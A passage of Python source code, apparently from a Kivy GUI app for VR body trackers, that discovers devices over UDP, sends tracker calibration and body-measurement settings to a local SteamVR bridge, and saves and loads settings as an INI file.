self.calibrate_imu_button_disabled(False)
def calibrate_imu(self):
self.calibrate_run = True
self.calibrate_process = threading.Thread(target=self.calibrate, args=())
self.calibrate_process.start()
def measure_height(self):
payload = struct.pack('<B', 31)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
def check_payload(self, payload):
if payload[0] == ord('I') and payload[-1] == ord('i'):
return True
else:
return False
def wrap_payload(self, payload):
header = b'I'
footer = b'i'
return header + payload + footer
def unwrap_payload(self, payload):
return payload[1:-1]
@mainthread
def add_stack_role(self, mac, connect, mode, power, sleep, role):
RoleList_widget = RoleList(mac, connect, mode, power, sleep, role)
self.root.ids.stack_role.add_widget(RoleList_widget)
self.root.ids[mac + '_role'] = RoleList_widget
@mainthread
def remove_stack_role(self, k):
if k + '_role' in self.root.ids.keys():
self.root.ids.stack_role.remove_widget(self.root.ids[k + '_role'])
if k + '_role' in self.root.ids.keys():
del self.root.ids[k + '_role']
if k + '_role_mac' in self.root.ids.keys():
del self.root.ids[k + '_role_mac']
if k + '_role_connect' in self.root.ids.keys():
del self.root.ids[k + '_role_connect']
if k + '_role_mode' in self.root.ids.keys():
del self.root.ids[k + '_role_mode']
if k + '_role_power' in self.root.ids.keys():
del self.root.ids[k + '_role_power']
if k + '_role_sleep' in self.root.ids.keys():
del self.root.ids[k + '_role_sleep']
if k + '_role_role' in self.root.ids.keys():
del self.root.ids[k + '_role_role']
@mainthread
def steam_status_text(self, val):
self.root.ids.steam_status.text = val
def broadudp(self):
broad_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
broad_listen.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
broad_listen.bind(('0.0.0.0', self.broadPort))
broad_listen.settimeout(0.5)
hostname = socket.gethostname()
host_list = socket.getaddrinfo(hostname, self.broadPort, socket.AF_INET, socket.SOCK_DGRAM)
hostIPs = ['127.0.0.1']
for i in range(len(host_list)):
hostIPs.append(host_list[i][4][0])
while self.broad_run:
try:
payload, addr = broad_listen.recvfrom(32)
if self.check_payload(payload):
payload = self.unwrap_payload(payload)
if len(payload) == struct.calcsize('<BBBBBBB?'):
if payload[0] == 77:
ip = addr[0]
mac = binascii.hexlify(payload[1:7]).decode()
extend = payload[7]
macs = [mac + '_main', mac + '_extend']
roles_reply = [0, 0]
modes_reply = [0, 0]
if extend:
for_length = 2
else:
for_length = 1
for i in range(for_length):
mac = macs[i]
self.devices_broad_online[mac] = time.perf_counter()
if mac + '_role' not in self.root.ids.keys():
if mac in self.devices_list.keys():
connect = self.devices_list[mac]['connect']
mode = self.devices_list[mac]['mode']
power = self.devices_list[mac]['power']
sleep = self.devices_list[mac]['sleep']
role = self.devices_list[mac]['role']
else:
connect = False
mode = MODE[0]
power = '19.5'
sleep = True
role = ROLE[0]
self.devices_list[mac] = {}
self.devices_list[mac]['connect'] = connect
self.devices_list[mac]['mode'] = mode
self.devices_list[mac]['power'] = power
self.devices_list[mac]['sleep'] = sleep
self.devices_list[mac]['role'] = role
self.add_stack_role(mac, connect, mode, power, sleep, role)
roles_reply[i] = ROLE.index(self.devices_list[mac]['role'])
modes_reply[i] = MODE.index(self.devices_list[mac]['mode'])
if self.devices_list[macs[0]]['connect']:
reply = struct.pack('<BBBBBBBHH', 200, roles_reply[0], roles_reply[1], modes_reply[0], modes_reply[1],
int(float(self.devices_list[mac]['power']) * 4), self.devices_list[mac]['sleep'],
self.serverPort, self.bridgePort)
broad_listen.sendto(self.wrap_payload(reply), (ip, self.broadPort))
elif len(payload) == struct.calcsize('<BH'):
if payload[0] == 17 and addr[0] in hostIPs:
self.steam_status_text('SteamVR online')
ip = addr[0]
_, self.bridgePort = struct.unpack('<BH', payload)
reply = struct.pack('<BH', 18, self.serverPort)
broad_listen.sendto(self.wrap_payload(reply), (ip, self.bridgePort))
except:
pass
to_del = []
for k, v in self.devices_broad_online.items():
if time.perf_counter() - v >= 5:
to_del.append(k)
for k in to_del:
if k in self.devices_broad_online.keys():
del self.devices_broad_online[k]
self.remove_stack_role(k)
broad_listen.close()
@mainthread
def add_stack_list(self, mac, ip, battery, mode, accuracy, power ,sleep, role):
DeviceList_widget = DeviceList(mac, ip, battery, mode, accuracy, power ,sleep, role)
self.root.ids.stack_list.add_widget(DeviceList_widget)
self.root.ids[mac + '_list'] = DeviceList_widget
@mainthread
def edit_stack_list(self, mac, ip, battery, mode, accuracy, power ,sleep, role):
self.root.ids[mac + '_list_mac'].text = str(mac)
self.root.ids[mac + '_list_ip'].text = str(ip)
self.root.ids[mac + '_list_battery'].text = str(battery)
self.root.ids[mac + '_list_percent'].text = str(battPercent(battery))
self.root.ids[mac + '_list_mode'].text = str(mode)
self.root.ids[mac + '_list_accuracy'].text = str(accuracy)
self.root.ids[mac + '_list_power'].text = str(power)
self.root.ids[mac + '_list_sleep'].text = str(sleep)
self.root.ids[mac + '_list_role'].text = str(role)
@mainthread
def remove_stack_list(self, k):
if k + '_list' in self.root.ids.keys():
self.root.ids.stack_list.remove_widget(self.root.ids[k + '_list'])
if k + '_list' in self.root.ids.keys():
del self.root.ids[k + '_list']
if k + '_list_mac' in self.root.ids.keys():
del self.root.ids[k + '_list_mac']
if k + '_list_ip' in self.root.ids.keys():
del self.root.ids[k + '_list_ip']
if k + '_list_battery' in self.root.ids.keys():
del self.root.ids[k + '_list_battery']
if k + '_list_percent' in self.root.ids.keys():
del self.root.ids[k + '_list_percent']
if k + '_list_mode' in self.root.ids.keys():
del self.root.ids[k + '_list_mode']
if k + '_list_accuracy' in self.root.ids.keys():
del self.root.ids[k + '_list_accuracy']
if k + '_list_power' in self.root.ids.keys():
del self.root.ids[k + '_list_power']
if k + '_list_sleep' in self.root.ids.keys():
del self.root.ids[k + '_list_sleep']
if k + '_list_role' in self.root.ids.keys():
del self.root.ids[k + '_list_role']
@mainthread
def headset_height_text(self, val):
self.root.ids.headset_height.text = val
@mainthread
def on_tracker_data(self, payload):
if payload[0] in range(1, 13) and self.current_page == 'Tracker Data':
tracker_type = 'tracker_{}'.format(payload[0])
_, ac, px, py, pz, qx, qy, qz, qw, _ = struct.unpack('<B?fffhhhhB', payload)
self.root.ids[tracker_type].ac.text = str(ac)
self.root.ids[tracker_type].px.text = '{:.2f}'.format(px)
self.root.ids[tracker_type].py.text = '{:.2f}'.format(py)
self.root.ids[tracker_type].pz.text = '{:.2f}'.format(pz)
self.root.ids[tracker_type].qx.text = '{:.2f}'.format(mapRange(qx))
self.root.ids[tracker_type].qy.text = '{:.2f}'.format(mapRange(qy))
self.root.ids[tracker_type].qz.text = '{:.2f}'.format(mapRange(qz))
self.root.ids[tracker_type].qw.text = '{:.2f}'.format(mapRange(qw))
def udp(self):
self.sock_listen = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock_listen.bind(('0.0.0.0', 0))
self.sock_listen.settimeout(0.5)
self.serverPort = self.sock_listen.getsockname()[1]
t_tx_driver = time.perf_counter()
while self.thread_run:
try:
payload, addr = self.sock_listen.recvfrom(32)
if self.check_payload(payload):
payload = self.unwrap_payload(payload)
if len(payload) == struct.calcsize('<Bf'):
if payload[0] == 32:
height = struct.unpack('<f', payload[1:])[0]
self.headset_height_text('{:.2f} m'.format(height))
elif len(payload) == struct.calcsize('<BH'):
if payload[0] == 87:
self.steam_status_text('SteamVR online')
_, self.bridgePort = struct.unpack('<BH', payload)
self.set_driver_settings()
t_tx_driver = time.perf_counter()
elif payload[0] == 97:
self.steam_status_text('SteamVR online')
_, self.bridgePort = struct.unpack('<BH', payload)
self.set_init_settings()
t_tx_driver = time.perf_counter()
elif len(payload) == struct.calcsize('<B?fffhhhhB'):
self.on_tracker_data(payload)
elif len(payload) == struct.calcsize('<BBBBBBBBfBBBBBB?'):
mac = binascii.hexlify(payload[2:8]).decode()
ip = addr[0]
battery, mode, mode_ext, accuracy, accuracy_ext, power, sleep, extend = struct.unpack('<fBBBBBB?', payload[8:])
battery = '{:.2f}'.format(battery)
power = '{:.1f}'.format(power/4.0)
sleep = str(bool(sleep))
roles_reply = [0, 0]
modes_reply = [0, 0]
if extend:
for_length = 2
roles = [ROLE[payload[0]], ROLE[payload[1]]]
modes = [MODE_SHORT[mode], MODE_SHORT[mode_ext]]
accuracies = [ACCURACY[accuracy], ACCURACY[accuracy_ext]]
macs = [mac + '_main', mac + '_extend']
else:
for_length = 1
roles = [ROLE[payload[0]]]
modes = [MODE_SHORT[mode]]
accuracies = [ACCURACY[accuracy]]
macs = [mac + '_main']
for i in range(for_length):
role = roles[i]
mode = modes[i]
accuracy = accuracies[i]
mac = macs[i]
self.devices_online[mac] = time.perf_counter()
self.devices_broad_online[mac] = time.perf_counter()
if mac + '_list' not in self.root.ids.keys():
self.add_stack_list(mac, ip, battery, mode, accuracy, power, sleep, role)
else:
self.edit_stack_list(mac, ip, battery, mode, accuracy, power, sleep, role)
roles_reply[i] = ROLE.index(self.devices_list[mac]['role'])
modes_reply[i] = MODE.index(self.devices_list[mac]['mode'])
if self.devices_list[macs[0]]['connect']:
reply = struct.pack('<BBBBBBBHH', 200, roles_reply[0], roles_reply[1], modes_reply[0], modes_reply[1],
int(float(self.devices_list[mac]['power']) * 4), self.devices_list[mac]['sleep'],
self.serverPort, self.bridgePort)
self.sock_listen.sendto(self.wrap_payload(reply), (ip, self.broadPort))
except:
pass
if time.perf_counter() - t_tx_driver >= 5:
self.steam_status_text('SteamVR offline')
self.bridgePort = 0
to_del = []
for k, v in self.devices_online.items():
if time.perf_counter() - v >= 5:
to_del.append(k)
for k in to_del:
if k in self.devices_online.keys():
del self.devices_online[k]
self.remove_stack_list(k)
self.sock_listen.close()
def onTabChange(self, tab):
self.current_page = tab.text
if tab.text == 'Tracker Data':
if self.bridgePort != 0:
payload = struct.pack('<B', 171)
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
else:
if self.bridgePort != 0:
payload = struct.pack('<B', 172)
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
def set_driver_settings(self):
T_lfoot_drv = [math.radians(float(self.root.ids.lfoot_t.tx.text)),
math.radians(float(self.root.ids.lfoot_t.ty.text)),
math.radians(float(self.root.ids.lfoot_t.tz.text))]
T_rfoot_drv = [math.radians(float(self.root.ids.rfoot_t.tx.text)),
math.radians(float(self.root.ids.rfoot_t.ty.text)),
math.radians(float(self.root.ids.rfoot_t.tz.text))]
T_lshin_drv = [math.radians(float(self.root.ids.lshin_t.tx.text)),
math.radians(float(self.root.ids.lshin_t.ty.text)),
math.radians(float(self.root.ids.lshin_t.tz.text))]
T_rshin_drv = [math.radians(float(self.root.ids.rshin_t.tx.text)),
math.radians(float(self.root.ids.rshin_t.ty.text)),
math.radians(float(self.root.ids.rshin_t.tz.text))]
T_lthigh_drv = [math.radians(float(self.root.ids.lthigh_t.tx.text)),
math.radians(float(self.root.ids.lthigh_t.ty.text)),
math.radians(float(self.root.ids.lthigh_t.tz.text))]
T_rthigh_drv = [math.radians(float(self.root.ids.rthigh_t.tx.text)),
math.radians(float(self.root.ids.rthigh_t.ty.text)),
math.radians(float(self.root.ids.rthigh_t.tz.text))]
T_waist_drv = [math.radians(float(self.root.ids.waist_t.tx.text)),
math.radians(float(self.root.ids.waist_t.ty.text)),
math.radians(float(self.root.ids.waist_t.tz.text))]
T_chest_drv = [math.radians(float(self.root.ids.chest_t.tx.text)),
math.radians(float(self.root.ids.chest_t.ty.text)),
math.radians(float(self.root.ids.chest_t.tz.text))]
T_lshoulder_drv = [math.radians(float(self.root.ids.lshoulder_t.tx.text)),
math.radians(float(self.root.ids.lshoulder_t.ty.text)),
math.radians(float(self.root.ids.lshoulder_t.tz.text))]
T_rshoulder_drv = [math.radians(float(self.root.ids.rshoulder_t.tx.text)),
math.radians(float(self.root.ids.rshoulder_t.ty.text)),
math.radians(float(self.root.ids.rshoulder_t.tz.text))]
T_lupperarm_drv = [math.radians(float(self.root.ids.lupperarm_t.tx.text)),
math.radians(float(self.root.ids.lupperarm_t.ty.text)),
math.radians(float(self.root.ids.lupperarm_t.tz.text))]
T_rupperarm_drv = [math.radians(float(self.root.ids.rupperarm_t.tx.text)),
math.radians(float(self.root.ids.rupperarm_t.ty.text)),
math.radians(float(self.root.ids.rupperarm_t.tz.text))]
shin_h = float(self.root.ids.shin_h.slider.value * self.root.ids.vscale.slider.value)
thigh_h = float(self.root.ids.thigh_h.slider.value * self.root.ids.vscale.slider.value)
lback_h = float(self.root.ids.lback_h.slider.value * self.root.ids.vscale.slider.value)
uback_h = float(self.root.ids.uback_h.slider.value * self.root.ids.vscale.slider.value)
head_h = float(self.root.ids.head_h.slider.value * self.root.ids.vscale.slider.value)
shoulder_h = float(self.root.ids.shoulder_h.slider.value * self.root.ids.vscale.slider.value)
hip_width_h = float(self.root.ids.hip_width_h.slider.value * self.root.ids.hscale.slider.value)
shoulder_width_h = float(self.root.ids.shoulder_width_h.slider.value * self.root.ids.hscale.slider.value)
foot_sensor_h = float(self.root.ids.foot_sensor_h.slider.value)
shin_sensor_h = float(self.root.ids.shin_sensor_h.slider.value)
thigh_sensor_h = float(self.root.ids.thigh_sensor_h.slider.value)
waist_sensor_h = float(self.root.ids.waist_sensor_h.slider.value)
chest_sensor_h = float(self.root.ids.chest_sensor_h.slider.value)
shoulder_sensor_h = float(self.root.ids.shoulder_sensor_h.slider.value)
upperarm_sensor_h = float(self.root.ids.upperarm_sensor_h.slider.value)
floor_offset = float(self.root.ids.floor_offset.slider.value)
override_feet = self.root.ids.override_feet_en_check.switch.active
payload = bytearray(209)
struct.pack_into('<3f', payload, 0, *T_lfoot_drv)
struct.pack_into('<3f', payload, 12, *T_rfoot_drv)
struct.pack_into('<3f', payload, 24, *T_lshin_drv)
struct.pack_into('<3f', payload, 36, *T_rshin_drv)
struct.pack_into('<3f', payload, 48, *T_lthigh_drv)
struct.pack_into('<3f', payload, 60, *T_rthigh_drv)
struct.pack_into('<3f', payload, 72, *T_waist_drv)
struct.pack_into('<3f', payload, 84, *T_chest_drv)
struct.pack_into('<3f', payload, 96, *T_lshoulder_drv)
struct.pack_into('<3f', payload, 108, *T_rshoulder_drv)
struct.pack_into('<3f', payload, 120, *T_lupperarm_drv)
struct.pack_into('<3f', payload, 132, *T_rupperarm_drv)
struct.pack_into('<16f', payload, 144,
shin_h,
thigh_h,
lback_h,
uback_h,
head_h,
shoulder_h,
hip_width_h,
shoulder_width_h,
foot_sensor_h,
shin_sensor_h,
thigh_sensor_h,
waist_sensor_h,
chest_sensor_h,
shoulder_sensor_h,
upperarm_sensor_h,
floor_offset)
struct.pack_into('<?', payload, 208, override_feet)
if not self.focused and self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
lfoot_1 = float(self.root.ids.lfoot_o.slider1.value)
lfoot_2 = float(self.root.ids.lfoot_o.slider2.value)
rfoot_1 = float(self.root.ids.rfoot_o.slider1.value)
rfoot_2 = float(self.root.ids.rfoot_o.slider2.value)
lshin_1 = float(self.root.ids.lshin_o.slider1.value)
lshin_2 = float(self.root.ids.lshin_o.slider2.value)
rshin_1 = float(self.root.ids.rshin_o.slider1.value)
rshin_2 = float(self.root.ids.rshin_o.slider2.value)
lthigh_1 = float(self.root.ids.lthigh_o.slider1.value)
lthigh_2 = float(self.root.ids.lthigh_o.slider2.value)
rthigh_1 = float(self.root.ids.rthigh_o.slider1.value)
rthigh_2 = float(self.root.ids.rthigh_o.slider2.value)
waist_1 = float(self.root.ids.waist_o.slider1.value)
waist_2 = float(self.root.ids.waist_o.slider2.value)
chest_1 = float(self.root.ids.chest_o.slider1.value)
chest_2 = float(self.root.ids.chest_o.slider2.value)
lshoulder_1 = float(self.root.ids.lshoulder_o.slider1.value)
lshoulder_2 = float(self.root.ids.lshoulder_o.slider2.value)
rshoulder_1 = float(self.root.ids.rshoulder_o.slider1.value)
rshoulder_2 = float(self.root.ids.rshoulder_o.slider2.value)
lupperarm_1 = float(self.root.ids.lupperarm_o.slider1.value)
lupperarm_2 = float(self.root.ids.lupperarm_o.slider2.value)
rupperarm_1 = float(self.root.ids.rupperarm_o.slider1.value)
rupperarm_2 = float(self.root.ids.rupperarm_o.slider2.value)
head_1 = float(self.root.ids.head_o.slider1.value)
head_2 = float(self.root.ids.head_o.slider2.value)
payload = bytearray(104)
struct.pack_into('<2f', payload, 0, lfoot_1, lfoot_2)
struct.pack_into('<2f', payload, 8, rfoot_1, rfoot_2)
struct.pack_into('<2f', payload, 16, lshin_1, lshin_2)
struct.pack_into('<2f', payload, 24, rshin_1, rshin_2)
struct.pack_into('<2f', payload, 32, lthigh_1, lthigh_2)
struct.pack_into('<2f', payload, 40, rthigh_1, rthigh_2)
struct.pack_into('<2f', payload, 48, waist_1, waist_2)
struct.pack_into('<2f', payload, 56, chest_1, chest_2)
struct.pack_into('<2f', payload, 64, lshoulder_1, lshoulder_2)
struct.pack_into('<2f', payload, 72, rshoulder_1, rshoulder_2)
struct.pack_into('<2f', payload, 80, lupperarm_1, lupperarm_2)
struct.pack_into('<2f', payload, 88, rupperarm_1, rupperarm_2)
struct.pack_into('<2f', payload, 96, head_1, head_2)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
def set_init_settings(self):
feet_enable = self.root.ids.feet_en_check.switch.active
shin_enable = self.root.ids.shin_en_check.switch.active
thigh_enable = self.root.ids.thigh_en_check.switch.active
waist_enable = self.root.ids.waist_en_check.switch.active
chest_enable = self.root.ids.chest_en_check.switch.active
shoulder_enable = self.root.ids.shoulder_en_check.switch.active
upperarm_enable = self.root.ids.upperarm_en_check.switch.active
payload = struct.pack('<7B',
feet_enable,
shin_enable,
thigh_enable,
waist_enable,
chest_enable,
shoulder_enable,
upperarm_enable)
if self.bridgePort != 0:
self.sock_listen.sendto(self.wrap_payload(payload), ('127.0.0.1', self.bridgePort))
@mainthread
def save(self, file):
config = ConfigParser()
config.add_section('version')
config.set('version', 'version', VERSION)
config.add_section('lfoot')
config.set('lfoot', 'x', self.root.ids.lfoot_t.tx.text)
config.set('lfoot', 'y', self.root.ids.lfoot_t.ty.text)
config.set('lfoot', 'z', self.root.ids.lfoot_t.tz.text)
config.add_section('rfoot')
config.set('rfoot', 'x', self.root.ids.rfoot_t.tx.text)
config.set('rfoot', 'y', self.root.ids.rfoot_t.ty.text)
config.set('rfoot', 'z', self.root.ids.rfoot_t.tz.text)
config.add_section('lshin')
config.set('lshin', 'x', self.root.ids.lshin_t.tx.text)
config.set('lshin', 'y', self.root.ids.lshin_t.ty.text)
config.set('lshin', 'z', self.root.ids.lshin_t.tz.text)
config.add_section('rshin')
config.set('rshin', 'x', self.root.ids.rshin_t.tx.text)
config.set('rshin', 'y', self.root.ids.rshin_t.ty.text)
config.set('rshin', 'z', self.root.ids.rshin_t.tz.text)
config.add_section('lthigh')
config.set('lthigh', 'x', self.root.ids.lthigh_t.tx.text)
config.set('lthigh', 'y', self.root.ids.lthigh_t.ty.text)
config.set('lthigh', 'z', self.root.ids.lthigh_t.tz.text)
config.add_section('rthigh')
config.set('rthigh', 'x', self.root.ids.rthigh_t.tx.text)
config.set('rthigh', 'y', self.root.ids.rthigh_t.ty.text)
config.set('rthigh', 'z', self.root.ids.rthigh_t.tz.text)
config.add_section('waist')
config.set('waist', 'x', self.root.ids.waist_t.tx.text)
config.set('waist', 'y', self.root.ids.waist_t.ty.text)
config.set('waist', 'z', self.root.ids.waist_t.tz.text)
config.add_section('chest')
config.set('chest', 'x', self.root.ids.chest_t.tx.text)
config.set('chest', 'y', self.root.ids.chest_t.ty.text)
config.set('chest', 'z', self.root.ids.chest_t.tz.text)
config.add_section('lshoulder')
config.set('lshoulder', 'x', self.root.ids.lshoulder_t.tx.text)
config.set('lshoulder', 'y', self.root.ids.lshoulder_t.ty.text)
config.set('lshoulder', 'z', self.root.ids.lshoulder_t.tz.text)
config.add_section('rshoulder')
config.set('rshoulder', 'x', self.root.ids.rshoulder_t.tx.text)
config.set('rshoulder', 'y', self.root.ids.rshoulder_t.ty.text)
config.set('rshoulder', 'z', self.root.ids.rshoulder_t.tz.text)
config.add_section('lupperarm')
config.set('lupperarm', 'x', self.root.ids.lupperarm_t.tx.text)
config.set('lupperarm', 'y', self.root.ids.lupperarm_t.ty.text)
config.set('lupperarm', 'z', self.root.ids.lupperarm_t.tz.text)
config.add_section('rupperarm')
config.set('rupperarm', 'x', self.root.ids.rupperarm_t.tx.text)
config.set('rupperarm', 'y', self.root.ids.rupperarm_t.ty.text)
config.set('rupperarm', 'z', self.root.ids.rupperarm_t.tz.text)
config.add_section('parameter')
config.set('parameter', 'shin_h', str(self.root.ids.shin_h.slider.value))
config.set('parameter', 'thigh_h', str(self.root.ids.thigh_h.slider.value))
config.set('parameter', 'lback_h', str(self.root.ids.lback_h.slider.value))
config.set('parameter', 'uback_h', str(self.root.ids.uback_h.slider.value))
config.set('parameter', 'head_h', str(self.root.ids.head_h.slider.value))
config.set('parameter', 'shoulder_h', str(self.root.ids.shoulder_h.slider.value))
config.set('parameter', 'hip_width_h', str(self.root.ids.hip_width_h.slider.value))
config.set('parameter', 'shoulder_width_h', str(self.root.ids.shoulder_width_h.slider.value))
config.set('parameter', 'vscale', str(self.root.ids.vscale.slider.value))
config.set('parameter', 'hscale', str(self.root.ids.hscale.slider.value))
config.set('parameter', 'foot_sensor_h', str(self.root.ids.foot_sensor_h.slider.value))
config.set('parameter', 'shin_sensor_h', str(self.root.ids.shin_sensor_h.slider.value))
config.set('parameter', 'thigh_sensor_h', str(self.root.ids.thigh_sensor_h.slider.value))
config.set('parameter', 'waist_sensor_h', str(self.root.ids.waist_sensor_h.slider.value))
config.set('parameter', 'chest_sensor_h', str(self.root.ids.chest_sensor_h.slider.value))
config.set('parameter', 'shoulder_sensor_h', str(self.root.ids.shoulder_sensor_h.slider.value))
config.set('parameter', 'upperarm_sensor_h', str(self.root.ids.upperarm_sensor_h.slider.value))
config.set('parameter', 'floor_offset', str(self.root.ids.floor_offset.slider.value))
config.set('parameter', 'override_feet_en_check', str(int(self.root.ids.override_feet_en_check.switch.active)))
config.add_section('activation')
config.set('activation', 'feet_en_check', str(int(self.root.ids.feet_en_check.switch.active)))
config.set('activation', 'shin_en_check', str(int(self.root.ids.shin_en_check.switch.active)))
config.set('activation', 'thigh_en_check', str(int(self.root.ids.thigh_en_check.switch.active)))
config.set('activation', 'waist_en_check', str(int(self.root.ids.waist_en_check.switch.active)))
config.set('activation', 'chest_en_check', str(int(self.root.ids.chest_en_check.switch.active)))
config.set('activation', 'shoulder_en_check', str(int(self.root.ids.shoulder_en_check.switch.active)))
config.set('activation', 'upperarm_en_check', str(int(self.root.ids.upperarm_en_check.switch.active)))
config.add_section('offset')
config.set('offset', 'lfoot_pos_1', str(self.root.ids.lfoot_o.slider1.value))
config.set('offset', 'lfoot_pos_2', str(self.root.ids.lfoot_o.slider2.value))
config.set('offset', 'rfoot_pos_1', str(self.root.ids.rfoot_o.slider1.value))
config.set('offset', 'rfoot_pos_2', str(self.root.ids.rfoot_o.slider2.value))
config.set('offset', 'lshin_pos_1', str(self.root.ids.lshin_o.slider1.value))
config.set('offset', 'lshin_pos_2', str(self.root.ids.lshin_o.slider2.value))
config.set('offset', 'rshin_pos_1', str(self.root.ids.rshin_o.slider1.value))
config.set('offset', 'rshin_pos_2', str(self.root.ids.rshin_o.slider2.value))
config.set('offset', 'lthigh_pos_1', str(self.root.ids.lthigh_o.slider1.value))
config.set('offset', 'lthigh_pos_2', str(self.root.ids.lthigh_o.slider2.value))
config.set('offset', 'rthigh_pos_1', str(self.root.ids.rthigh_o.slider1.value))
config.set('offset', 'rthigh_pos_2', str(self.root.ids.rthigh_o.slider2.value))
config.set('offset', 'waist_pos_1', str(self.root.ids.waist_o.slider1.value))
config.set('offset', 'waist_pos_2', str(self.root.ids.waist_o.slider2.value))
config.set('offset', 'chest_pos_1', str(self.root.ids.chest_o.slider1.value))
config.set('offset', 'chest_pos_2', str(self.root.ids.chest_o.slider2.value))
config.set('offset', 'lshoulder_pos_1', str(self.root.ids.lshoulder_o.slider1.value))
config.set('offset', 'lshoulder_pos_2', str(self.root.ids.lshoulder_o.slider2.value))
config.set('offset', 'rshoulder_pos_1', str(self.root.ids.rshoulder_o.slider1.value))
config.set('offset', 'rshoulder_pos_2', str(self.root.ids.rshoulder_o.slider2.value))
config.set('offset', 'lupperarm_pos_1', str(self.root.ids.lupperarm_o.slider1.value))
config.set('offset', 'lupperarm_pos_2', str(self.root.ids.lupperarm_o.slider2.value))
config.set('offset', 'rupperarm_pos_1', str(self.root.ids.rupperarm_o.slider1.value))
config.set('offset', 'rupperarm_pos_2', str(self.root.ids.rupperarm_o.slider2.value))
config.set('offset', 'head_pos_1', str(self.root.ids.head_o.slider1.value))
config.set('offset', 'head_pos_2', str(self.root.ids.head_o.slider2.value))
config.add_section('devices')
for k, v in self.devices_list.items():
config.set('devices', k, str(v['role']))
config.add_section('devices_mode')
for k, v in self.devices_list.items():
config.set('devices_mode', k, str(v['mode']))
config.add_section('devices_connect')
for k, v in self.devices_list.items():
config.set('devices_connect', k, str(int(v['connect'])))
config.add_section('devices_power')
for k, v in self.devices_list.items():
config.set('devices_power', k, str(v['power']))
config.add_section('devices_sleep')
for k, v in self.devices_list.items():
config.set('devices_sleep', k, str(int(v['sleep'])))
sections = ['lfoot', 'rfoot', 'lshin', 'rshin', 'lthigh', 'rthigh',
'waist', 'chest', 'lshoulder', 'rshoulder', 'lupperarm', 'rupperarm']
for section in sections:
for item in config.items(section):
if item[1] == '':
config.set(section, item[0], '0')
with open(file, 'w') as f:
config.write(f)
filename = file.split('\\')[-1]
self.root.ids.save_load_text.text = '{} saved'.format(filename)
self.update_settings(file)
@mainthread
def load(self, file):
if os.path.isfile(file):
try:
config = ConfigParser()
config.read(file)
if config.get('version', 'version') != VERSION:
raise
self.root.ids.lfoot_t.tx.text = config.get('lfoot', 'x')
self.root.ids.lfoot_t.ty.text = config.get('lfoot', 'y')
self.root.ids.lfoot_t.tz.text = config.get('lfoot', 'z')
self.root.ids.rfoot_t.tx.text = config.get('rfoot', 'x')
self.root.ids.rfoot_t.ty.text = config.get('rfoot', 'y')
self.root.ids.rfoot_t.tz.text = config.get('rfoot', 'z')
self.root.ids.lshin_t.tx.text = config.get('lshin', 'x')
self.root.ids.lshin_t.ty.text = config.get('lshin', 'y')
self.root.ids.lshin_t.tz.text = config.get('lshin', 'z')
self.root.ids.rshin_t.tx.text = config.get('rshin', 'x')
self.root.ids.rshin_t.ty.text = config.get('rshin', 'y')
self.root.ids.rshin_t.tz.text = config.get('rshin', 'z')
self.root.ids.lthigh_t.tx.text = config.get('lthigh', 'x')
self.root.ids.lthigh_t.ty.text = config.get('lthigh', 'y')
self.root.ids.lthigh_t.tz.text = config.get('lthigh', 'z')
self.root.ids.rthigh_t.tx.text = config.get('rthigh', 'x')
self.root.ids.rthigh_t.ty.text = config.get('rthigh', 'y')
self.root.ids.rthigh_t.tz.text = config.get('rthigh', 'z')
self.root.ids.waist_t.tx.text = config.get('waist', 'x')
self.root.ids.waist_t.ty.text = config.get('waist', 'y')
self.root.ids.waist_t.tz.text = config.get('waist', 'z')
self.root.ids.chest_t.tx.text = config.get('chest', 'x')
self.root.ids.chest_t.ty.text = config.get('chest', 'y')
self.root.ids.chest_t.tz.text = config.get('chest', 'z')
self.root.ids.lshoulder_t.tx.text = config.get('lshoulder', 'x')
self.root.ids.lshoulder_t.ty.text = config.get('lshoulder', 'y')
self.root.ids.lshoulder_t.tz.text = config.get('lshoulder', 'z')
self.root.ids.rshoulder_t.tx.text = config.get('rshoulder', 'x')
self.root.ids.rshoulder_t.ty.text = config.get('rshoulder', 'y')
self.root.ids.rshoulder_t.tz.text = config.get('rshoulder', 'z')
self.root.ids.lupperarm_t.tx.text = config.get('lupperarm', 'x')
self.root.ids.lupperarm_t.ty.text = config.get('lupperarm', 'y')
self.root.ids.lupperarm_t.tz.text = config.get('lupperarm', 'z')
self.root.ids.rupperarm_t.tx.text = config.get('rupperarm', 'x')
self.root.ids.rupperarm_t.ty.text = config.get('rupperarm', 'y')
self.root.ids.rupperarm_t.tz.text = config.get('rupperarm', 'z')
self.root.ids.shin_h.slider.value = float(config.get('parameter', 'shin_h'))
self.root.ids.thigh_h.slider.value = float(config.get('parameter', 'thigh_h'))
self.root.ids.lback_h.slider.value = float(config.get('parameter', 'lback_h'))
self.root.ids.uback_h.slider.value = float(config.get('parameter', 'uback_h'))
self.root.ids.head_h.slider.value = float(config.get('parameter', 'head_h'))
self.root.ids.shoulder_h.slider.value = float(config.get('parameter', 'shoulder_h'))
self.root.ids.hip_width_h.slider.value = float(config.get('parameter', 'hip_width_h'))
self.root.ids.shoulder_width_h.slider.value = float(config.get('parameter', 'shoulder_width_h'))
self.root.ids.vscale.slider.value = float(config.get('parameter', 'vscale'))
self.root.ids.hscale.slider.value = float(config.get('parameter', 'hscale'))
self.root.ids.foot_sensor_h.slider.value = float(config.get('parameter', 'foot_sensor_h'))
self.root.ids.shin_sensor_h.slider.value = float(config.get('parameter', 'shin_sensor_h'))
self.root.ids.thigh_sensor_h.slider.value = float(config.get('parameter', 'thigh_sensor_h'))
self.root.ids.waist_sensor_h.slider.value = float(config.get('parameter', 'waist_sensor_h'))
self.root.ids.chest_sensor_h.slider.value = float(config.get('parameter', 'chest_sensor_h'))
self.root.ids.shoulder_sensor_h.slider.value = float(config.get('parameter', 'shoulder_sensor_h'))
self.root.ids.upperarm_sensor_h.slider.value = float(config.get('parameter', 'upperarm_sensor_h'))
self.root.ids.floor_offset.slider.value = float(config.get('parameter', 'floor_offset'))
